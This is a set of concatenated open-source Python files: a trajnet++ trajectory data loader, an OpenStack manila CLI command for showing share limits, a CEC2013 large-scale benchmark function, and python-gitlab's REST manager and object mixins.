the-stack_0_6441
import numpy as np
import torch
import trajnetplusplustools
def pre_process_test(sc_, obs_len=8):
obs_frames = [primary_row.frame for primary_row in sc_[0]][:obs_len]
last_frame = obs_frames[-1]
sc_ = [[row for row in ped] for ped in sc_ if ped[0].frame <= last_frame]
return sc_
def trajnet_loader(data_loader, args):
batch = {'src': [], 'trg': []}
num_batches = 0
for batch_idx, (filename, scene_id, paths) in enumerate(data_loader):
## make new scene
pos_scene = trajnetplusplustools.Reader.paths_to_xy(paths)[:, 0] # primary ped
vel_scene = np.zeros_like(pos_scene)
vel_scene[1:] = pos_scene[1:] - pos_scene[:-1]
attr_scene = np.concatenate((pos_scene, vel_scene), axis=1)
batch['src'].append(attr_scene[:args.obs])
batch['trg'].append(attr_scene[-args.preds:])
num_batches += 1
if (num_batches % args.batch_size != 0) and (batch_idx + 1 != len(data_loader)):
continue
batch['src'] = torch.Tensor(np.stack(batch['src']))
batch['trg'] = torch.Tensor(np.stack(batch['trg']))
yield batch
batch = {'src': [], 'trg': []}
def trajnet_test_loader(data_loader, args):
batch = {'src': [], 'trg': []}
seq_start_end = []
num_batches = 0
for batch_idx, (filename, scene_id, paths) in enumerate(data_loader):
## make new scene
paths = pre_process_test(paths, args.obs)
pos_scene = trajnetplusplustools.Reader.paths_to_xy(paths)
vel_scene = np.zeros_like(pos_scene)
vel_scene[1:] = pos_scene[1:] - pos_scene[:-1]
attr_scene = np.concatenate((pos_scene, vel_scene), axis=2)
seq_start_end.append(pos_scene.shape[1])
batch['src'].append(attr_scene[:args.obs])
batch['trg'].append(attr_scene[-args.preds:])
num_batches += 1
if (num_batches % args.batch_size != 0) and (batch_idx + 1 != len(data_loader)):
continue
batch['src'] = torch.Tensor(np.concatenate(batch['src'], axis=1)).permute(1, 0, 2)
batch['trg'] = torch.Tensor(np.concatenate(batch['trg'], axis=1)).permute(1, 0, 2)
seq_start_end = [0] + seq_start_end
seq_start_end = torch.LongTensor(np.array(seq_start_end).cumsum())
seq_start_end = torch.stack((seq_start_end[:-1], seq_start_end[1:]), dim=1)
yield batch, seq_start_end
batch = {'src': [], 'trg': []}
seq_start_end = []
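A minimal driver sketch for the loaders above (illustrative only: `scenes` stands for a trajnet++ scene iterable such as the one produced by `trajnetplusplustools.Reader(...).scenes()`, and the argparse namespace fields simply mirror the attributes the loaders read):
# Example (not part of the original file)
from argparse import Namespace
args = Namespace(obs=9, preds=12, batch_size=32)
# for batch in trajnet_loader(scenes, args):
#     src, trg = batch['src'], batch['trg']  # shapes (B, obs, 4) and (B, preds, 4)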
the-stack_0_6443
# Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from osc_lib.command import command
from osc_lib import utils as oscutils
from manilaclient.common._i18n import _
class ShareLimitsShow(command.Lister):
"""Show a list of share limits for a user."""
_description = _("Show a list of share limits for a user.")
def get_parser(self, prog_name):
parser = super(ShareLimitsShow, self).get_parser(prog_name)
limit_type_group = parser.add_mutually_exclusive_group(required=True)
limit_type_group.add_argument(
'--absolute',
action='store_true',
default=False,
help=_('Get the absolute limits for the user')
)
limit_type_group.add_argument(
'--rate',
action='store_true',
default=False,
help=_('Get the API rate limits for the user')
)
return parser
def take_action(self, parsed_args):
share_client = self.app.client_manager.share
# limit_type = 'absolute'
if parsed_args.rate:
# limit_type = 'rate'
columns = [
"Verb",
"Regex",
"URI",
"Value",
"Remaining",
"Unit",
"Next Available",
]
data = list(share_client.limits.get().rate)
else:
columns = [
'Name',
'Value',
]
data = list(share_client.limits.get().absolute)
return (columns, (oscutils.get_item_properties(s, columns)
for s in data))
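A hedged sketch of how the (columns, rows) pair returned by `take_action` is consumed: cliff's Lister renders it as a table, and `oscutils.get_item_properties` reads lower-cased attribute names off each limit object (the fake limit object and its name below are illustrative, not taken from the file above):
# Example (not part of the original file)
columns = ['Name', 'Value']
fake_limit = type('AbsoluteLimit', (), {'name': 'maxTotalShares', 'value': 50})()
for row in (oscutils.get_item_properties(s, columns) for s in [fake_limit]):
    print(dict(zip(columns, row)))  # {'Name': 'maxTotalShares', 'Value': 50}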
the-stack_0_6445
import numpy as np
from lazy import lazy
from .cec2013lsgo import CEC2013LSGO
class F13(CEC2013LSGO):
"""
    Shifted Schwefel's Function with Conforming Overlapping Subcomponents (905-D)
"""
def __init__(
self,
*,
rng_seed: int = 42,
use_shuffle: bool = False,
verbose: int = 0
):
super(F13, self).__init__(
rng_seed=rng_seed,
use_shuffle=use_shuffle,
verbose=verbose,
)
self.c = np.cumsum(self.s)
self.m = 5
@property
def genome_size(self) -> np.ndarray:
return 905
@lazy
def lower_bound(self) -> np.ndarray:
lower_bound = [-100] * self.genome_size
return np.array(lower_bound)
@lazy
def upper_bound(self) -> np.ndarray:
upper_bound = [100] * self.genome_size
return np.array(upper_bound)
def _evaluate(self, x: np.ndarray) -> np.ndarray:
out_of_bounds = self.check_bounds(x)
out_of_bounds = np.any(out_of_bounds, axis=1)
x = x - self.xopt
fitness = 0
ldim = 0
for i in range(len(self.s)):
if i > 0:
ldim = self.c[i-1] - i * self.m
udim = self.c[i] - i * self.m
f: np.ndarray
z = x[:, self.p[ldim:udim] - 1].T
if self.s[i] == 25:
f = self.R25
elif self.s[i] == 50:
f = self.R50
elif self.s[i] == 100:
f = self.R100
f = f @ z
f = self._schwefel(f.T)
fitness += self.w[i] * f
        fitness[out_of_bounds] = np.nan  # invalidate out-of-bounds rows explicitly
return fitness
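A hedged evaluation sketch (it assumes the `CEC2013LSGO` base class loads `xopt`, the rotation matrices and the permutation `p`; `_evaluate` is called directly only because the base class's public entry point is not shown in this file):
# Example (not part of the original file)
f13 = F13(rng_seed=42)
population = np.random.uniform(-100.0, 100.0, size=(10, f13.genome_size))
fitness = f13._evaluate(population)  # shape (10,); out-of-bounds rows come back as NaN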
the-stack_0_6446
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013-2017 Gauvain Pocentek <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from types import ModuleType
from typing import (
Any,
Callable,
Dict,
List,
Optional,
Tuple,
Type,
TYPE_CHECKING,
Union,
)
import requests
import gitlab
from gitlab import base, cli
from gitlab import exceptions as exc
from gitlab import types as g_types
from gitlab import utils
__all__ = [
"GetMixin",
"GetWithoutIdMixin",
"RefreshMixin",
"ListMixin",
"RetrieveMixin",
"CreateMixin",
"UpdateMixin",
"SetMixin",
"DeleteMixin",
"CRUDMixin",
"NoUpdateMixin",
"SaveMixin",
"ObjectDeleteMixin",
"UserAgentDetailMixin",
"AccessRequestMixin",
"DownloadMixin",
"SubscribableMixin",
"TodoMixin",
"TimeTrackingMixin",
"ParticipantsMixin",
"BadgeRenderMixin",
]
if TYPE_CHECKING:
# When running mypy we use these as the base classes
_RestManagerBase = base.RESTManager
_RestObjectBase = base.RESTObject
else:
_RestManagerBase = object
_RestObjectBase = object
class GetMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_optional_get_attrs: Tuple[str, ...] = ()
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabGetError)
def get(
self, id: Union[str, int], lazy: bool = False, **kwargs: Any
) -> base.RESTObject:
"""Retrieve a single object.
Args:
id: ID of the object to retrieve
lazy: If True, don't request the server, but create a
shallow object giving access to the managers. This is
useful if you want to avoid useless calls to the API.
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The generated RESTObject.
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
if isinstance(id, str):
id = utils.EncodedId(id)
path = f"{self.path}/{id}"
if TYPE_CHECKING:
assert self._obj_cls is not None
if lazy is True:
if TYPE_CHECKING:
assert self._obj_cls._id_attr is not None
return self._obj_cls(self, {self._obj_cls._id_attr: id})
server_data = self.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
return self._obj_cls(self, server_data)
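For orientation, a caller-side sketch of the `get()` contract, kept as comments so the module stays importable (the URL and token are placeholders):
# Example (not part of this module)
# gl = gitlab.Gitlab("https://gitlab.example.com", private_token="<token>")
# project = gl.projects.get(42)                  # full HTTP round-trip
# lazy_project = gl.projects.get(42, lazy=True)  # shallow object, no request sent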
class GetWithoutIdMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_optional_get_attrs: Tuple[str, ...] = ()
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabGetError)
def get(
self, id: Optional[Union[int, str]] = None, **kwargs: Any
) -> Optional[base.RESTObject]:
"""Retrieve a single object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The generated RESTObject
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
if TYPE_CHECKING:
assert self.path is not None
server_data = self.gitlab.http_get(self.path, **kwargs)
if server_data is None:
return None
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
assert self._obj_cls is not None
return self._obj_cls(self, server_data)
class RefreshMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@exc.on_http_error(exc.GitlabGetError)
def refresh(self, **kwargs: Any) -> None:
"""Refresh a single object from server.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Returns None (updates the object)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
if self._id_attr:
path = f"{self.manager.path}/{self.encoded_id}"
else:
if TYPE_CHECKING:
assert self.manager.path is not None
path = self.manager.path
server_data = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
class ListMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_list_filters: Tuple[str, ...] = ()
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabListError)
def list(self, **kwargs: Any) -> Union[base.RESTObjectList, List[base.RESTObject]]:
"""Retrieve a list of objects.
Args:
all: If True, return all the items, without pagination
per_page: Number of items to retrieve per request
page: ID of the page to return (starts with page 1)
as_list: If set to False and no pagination option is
defined, return a generator instead of a list
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The list of objects, or a generator if `as_list` is False
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabListError: If the server cannot perform the request
"""
# Duplicate data to avoid messing with what the user sent us
data = kwargs.copy()
if self.gitlab.per_page:
data.setdefault("per_page", self.gitlab.per_page)
# global keyset pagination
if self.gitlab.pagination:
data.setdefault("pagination", self.gitlab.pagination)
if self.gitlab.order_by:
data.setdefault("order_by", self.gitlab.order_by)
# We get the attributes that need some special transformation
if self._types:
for attr_name, type_cls in self._types.items():
if attr_name in data.keys():
type_obj = type_cls(data[attr_name])
data[attr_name] = type_obj.get_for_api()
# Allow to overwrite the path, handy for custom listings
path = data.pop("path", self.path)
if TYPE_CHECKING:
assert self._obj_cls is not None
obj = self.gitlab.http_list(path, **data)
if isinstance(obj, list):
return [self._obj_cls(self, item, created_from_list=True) for item in obj]
else:
return base.RESTObjectList(self, self._obj_cls, obj)
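A caller-side pagination sketch matching the options documented above, continuing the `project` placeholder from the earlier sketch:
# Example (not part of this module)
# issues = project.issues.list(page=1, per_page=20)   # one page, returned as a list
# all_issues = project.issues.list(all=True)          # every item, paginated internally
# issue_gen = project.issues.list(as_list=False)      # RESTObjectList generator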
class RetrieveMixin(ListMixin, GetMixin):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
pass
class CreateMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
def _check_missing_create_attrs(self, data: Dict[str, Any]) -> None:
missing = []
for attr in self._create_attrs.required:
if attr not in data:
missing.append(attr)
continue
if missing:
raise AttributeError(f"Missing attributes: {', '.join(missing)}")
@exc.on_http_error(exc.GitlabCreateError)
def create(
self, data: Optional[Dict[str, Any]] = None, **kwargs: Any
) -> base.RESTObject:
"""Create a new object.
Args:
data: parameters to send to the server to create the
resource
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
A new instance of the managed object class built with
the data sent by the server
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabCreateError: If the server cannot perform the request
"""
if data is None:
data = {}
self._check_missing_create_attrs(data)
files = {}
# We get the attributes that need some special transformation
if self._types:
# Duplicate data to avoid messing with what the user sent us
data = data.copy()
for attr_name, type_cls in self._types.items():
if attr_name in data.keys():
type_obj = type_cls(data[attr_name])
                    # if the type is FileAttribute we need to pass the data as
                    # file
if isinstance(type_obj, g_types.FileAttribute):
k = type_obj.get_file_name(attr_name)
files[attr_name] = (k, data.pop(attr_name))
else:
data[attr_name] = type_obj.get_for_api()
# Handle specific URL for creation
path = kwargs.pop("path", self.path)
server_data = self.gitlab.http_post(path, post_data=data, files=files, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
assert self._obj_cls is not None
return self._obj_cls(self, server_data)
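A caller-side sketch of `create()`; the required attribute set is defined per manager in `_create_attrs`, and the issue fields used here are the usual GitLab ones:
# Example (not part of this module)
# issue = project.issues.create({"title": "Bug report", "description": "Steps to reproduce..."})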
class UpdateMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
_update_uses_post: bool = False
gitlab: gitlab.Gitlab
def _check_missing_update_attrs(self, data: Dict[str, Any]) -> None:
if TYPE_CHECKING:
assert self._obj_cls is not None
# Remove the id field from the required list as it was previously moved
# to the http path.
required = tuple(
[k for k in self._update_attrs.required if k != self._obj_cls._id_attr]
)
missing = []
for attr in required:
if attr not in data:
missing.append(attr)
continue
if missing:
raise AttributeError(f"Missing attributes: {', '.join(missing)}")
def _get_update_method(
self,
) -> Callable[..., Union[Dict[str, Any], requests.Response]]:
"""Return the HTTP method to use.
Returns:
http_put (default) or http_post
"""
if self._update_uses_post:
http_method = self.gitlab.http_post
else:
http_method = self.gitlab.http_put
return http_method
@exc.on_http_error(exc.GitlabUpdateError)
def update(
self,
id: Optional[Union[str, int]] = None,
new_data: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> Dict[str, Any]:
"""Update an object on the server.
Args:
id: ID of the object to update (can be None if not required)
new_data: the update data for the object
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The new object data (*not* a RESTObject)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabUpdateError: If the server cannot perform the request
"""
new_data = new_data or {}
if id is None:
path = self.path
else:
path = f"{self.path}/{utils.EncodedId(id)}"
self._check_missing_update_attrs(new_data)
files = {}
# We get the attributes that need some special transformation
if self._types:
# Duplicate data to avoid messing with what the user sent us
new_data = new_data.copy()
for attr_name, type_cls in self._types.items():
if attr_name in new_data.keys():
type_obj = type_cls(new_data[attr_name])
                    # if the type is FileAttribute we need to pass the data as
                    # file
if isinstance(type_obj, g_types.FileAttribute):
k = type_obj.get_file_name(attr_name)
files[attr_name] = (k, new_data.pop(attr_name))
else:
new_data[attr_name] = type_obj.get_for_api()
http_method = self._get_update_method()
result = http_method(path, post_data=new_data, files=files, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
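Manager-level `update()` returns the raw server dict rather than a RESTObject; a short sketch:
# Example (not part of this module)
# attrs = project.issues.update(issue.iid, {"description": "Updated details"})
# isinstance(attrs, dict)  # True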
class SetMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabSetError)
def set(self, key: str, value: str, **kwargs: Any) -> base.RESTObject:
"""Create or update the object.
Args:
key: The key of the object to create/update
value: The value to set for the object
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabSetError: If an error occurred
Returns:
The created/updated attribute
"""
path = f"{self.path}/{utils.EncodedId(key)}"
data = {"value": value}
server_data = self.gitlab.http_put(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
assert self._obj_cls is not None
return self._obj_cls(self, server_data)
class DeleteMixin(_RestManagerBase):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
@exc.on_http_error(exc.GitlabDeleteError)
def delete(self, id: Optional[Union[str, int]] = None, **kwargs: Any) -> None:
"""Delete an object on the server.
Args:
id: ID of the object to delete
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabDeleteError: If the server cannot perform the request
"""
if id is None:
path = self.path
else:
path = f"{self.path}/{utils.EncodedId(id)}"
if TYPE_CHECKING:
assert path is not None
self.gitlab.http_delete(path, **kwargs)
class CRUDMixin(GetMixin, ListMixin, CreateMixin, UpdateMixin, DeleteMixin):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
pass
class NoUpdateMixin(GetMixin, ListMixin, CreateMixin, DeleteMixin):
_computed_path: Optional[str]
_from_parent_attrs: Dict[str, Any]
_obj_cls: Optional[Type[base.RESTObject]]
_parent: Optional[base.RESTObject]
_parent_attrs: Dict[str, Any]
_path: Optional[str]
gitlab: gitlab.Gitlab
pass
class SaveMixin(_RestObjectBase):
"""Mixin for RESTObject's that can be updated."""
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
def _get_updated_data(self) -> Dict[str, Any]:
updated_data = {}
for attr in self.manager._update_attrs.required:
# Get everything required, no matter if it's been updated
updated_data[attr] = getattr(self, attr)
# Add the updated attributes
updated_data.update(self._updated_attrs)
return updated_data
def save(self, **kwargs: Any) -> Optional[Dict[str, Any]]:
"""Save the changes made to the object to the server.
The object is updated to match what the server returns.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Returns:
The new object data (*not* a RESTObject)
Raise:
GitlabAuthenticationError: If authentication is not correct
GitlabUpdateError: If the server cannot perform the request
"""
updated_data = self._get_updated_data()
# Nothing to update. Server fails if sent an empty dict.
if not updated_data:
return None
# call the manager
obj_id = self.encoded_id
if TYPE_CHECKING:
assert isinstance(self.manager, UpdateMixin)
server_data = self.manager.update(obj_id, updated_data, **kwargs)
self._update_attrs(server_data)
return server_data
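Object-level counterpart: `save()` sends only the changed attributes (plus the manager's required ones) through `update()`; a sketch:
# Example (not part of this module)
# issue = project.issues.get(1)
# issue.labels = ["bug"]
# issue.save()  # PUT with {"labels": ["bug"]} plus any required attributes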
class ObjectDeleteMixin(_RestObjectBase):
"""Mixin for RESTObject's that can be deleted."""
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
def delete(self, **kwargs: Any) -> None:
"""Delete the object from the server.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabDeleteError: If the server cannot perform the request
"""
if TYPE_CHECKING:
assert isinstance(self.manager, DeleteMixin)
assert self.encoded_id is not None
self.manager.delete(self.encoded_id, **kwargs)
class UserAgentDetailMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("Snippet", "ProjectSnippet", "ProjectIssue"))
@exc.on_http_error(exc.GitlabGetError)
def user_agent_detail(self, **kwargs: Any) -> Dict[str, Any]:
"""Get the user agent detail.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server cannot perform the request
"""
path = f"{self.manager.path}/{self.encoded_id}/user_agent_detail"
result = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
class AccessRequestMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(
("ProjectAccessRequest", "GroupAccessRequest"), (), ("access_level",)
)
@exc.on_http_error(exc.GitlabUpdateError)
def approve(
self, access_level: int = gitlab.const.DEVELOPER_ACCESS, **kwargs: Any
) -> None:
"""Approve an access request.
Args:
access_level: The access level for the user
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabUpdateError: If the server fails to perform the request
"""
path = f"{self.manager.path}/{self.encoded_id}/approve"
data = {"access_level": access_level}
server_data = self.manager.gitlab.http_put(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
class DownloadMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("GroupExport", "ProjectExport"))
@exc.on_http_error(exc.GitlabGetError)
def download(
self,
streamed: bool = False,
action: Optional[Callable] = None,
chunk_size: int = 1024,
**kwargs: Any,
) -> Optional[bytes]:
"""Download the archive of a resource export.
Args:
streamed: If True the data will be processed by chunks of
`chunk_size` and each chunk is passed to `action` for
treatment
action: Callable responsible of dealing with chunk of
data
chunk_size: Size of each chunk
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabGetError: If the server failed to perform the request
Returns:
The blob content if streamed is False, None otherwise
"""
path = f"{self.manager.path}/download"
result = self.manager.gitlab.http_get(
path, streamed=streamed, raw=True, **kwargs
)
if TYPE_CHECKING:
assert isinstance(result, requests.Response)
return utils.response_content(result, streamed, action, chunk_size)
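A typical export flow built on this mixin; the export has to reach the "finished" state server-side before the archive can be downloaded:
# Example (not part of this module)
# export = project.exports.create()
# export.refresh()  # poll until export.export_status == "finished"
# with open("export.tgz", "wb") as f:
#     f.write(export.download())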
class SubscribableMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(
("ProjectIssue", "ProjectMergeRequest", "ProjectLabel", "GroupLabel")
)
@exc.on_http_error(exc.GitlabSubscribeError)
def subscribe(self, **kwargs: Any) -> None:
"""Subscribe to the object notifications.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
raises:
GitlabAuthenticationError: If authentication is not correct
GitlabSubscribeError: If the subscription cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/subscribe"
server_data = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
@cli.register_custom_action(
("ProjectIssue", "ProjectMergeRequest", "ProjectLabel", "GroupLabel")
)
@exc.on_http_error(exc.GitlabUnsubscribeError)
def unsubscribe(self, **kwargs: Any) -> None:
"""Unsubscribe from the object notifications.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
raises:
GitlabAuthenticationError: If authentication is not correct
GitlabUnsubscribeError: If the unsubscription cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/unsubscribe"
server_data = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(server_data, requests.Response)
self._update_attrs(server_data)
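Both calls update the object in place from the server response; a minimal sketch:
# Example (not part of this module)
# issue.subscribe()
# issue.unsubscribe()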
class TodoMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTodoError)
def todo(self, **kwargs: Any) -> None:
"""Create a todo associated to the object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTodoError: If the todo cannot be set
"""
path = f"{self.manager.path}/{self.encoded_id}/todo"
self.manager.gitlab.http_post(path, **kwargs)
class TimeTrackingMixin(_RestObjectBase):
_id_attr: Optional[str]
_attrs: Dict[str, Any]
_module: ModuleType
_parent_attrs: Dict[str, Any]
_updated_attrs: Dict[str, Any]
manager: base.RESTManager
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def time_stats(self, **kwargs: Any) -> Dict[str, Any]:
"""Get time stats for the object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
        # Use the existing time_stats attribute if it exists, otherwise make an
        # API call
if "time_stats" in self.attributes:
return self.attributes["time_stats"]
path = f"{self.manager.path}/{self.encoded_id}/time_stats"
result = self.manager.gitlab.http_get(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"), ("duration",))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def time_estimate(self, duration: str, **kwargs: Any) -> Dict[str, Any]:
"""Set an estimated time of work for the object.
Args:
duration: Duration in human format (e.g. 3h30)
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/time_estimate"
data = {"duration": duration}
result = self.manager.gitlab.http_post(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def reset_time_estimate(self, **kwargs: Any) -> Dict[str, Any]:
"""Resets estimated time for the object to 0 seconds.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/reset_time_estimate"
result = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"), ("duration",))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def add_spent_time(self, duration: str, **kwargs: Any) -> Dict[str, Any]:
"""Add time spent working on the object.
Args:
duration: Duration in human format (e.g. 3h30)
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/add_spent_time"
data = {"duration": duration}
result = self.manager.gitlab.http_post(path, post_data=data, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
@cli.register_custom_action(("ProjectIssue", "ProjectMergeRequest"))
@exc.on_http_error(exc.GitlabTimeTrackingError)
def reset_spent_time(self, **kwargs: Any) -> Dict[str, Any]:
"""Resets the time spent working on the object.
Args:
**kwargs: Extra options to send to the server (e.g. sudo)
Raises:
GitlabAuthenticationError: If authentication is not correct
GitlabTimeTrackingError: If the time tracking update cannot be done
"""
path = f"{self.manager.path}/{self.encoded_id}/reset_spent_time"
result = self.manager.gitlab.http_post(path, **kwargs)
if TYPE_CHECKING:
assert not isinstance(result, requests.Response)
return result
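A caller-side sketch of the time-tracking helpers; durations use GitLab's human-readable format:
# Example (not part of this module)
# issue.time_estimate("3h30m")
# issue.add_spent_time("1h")
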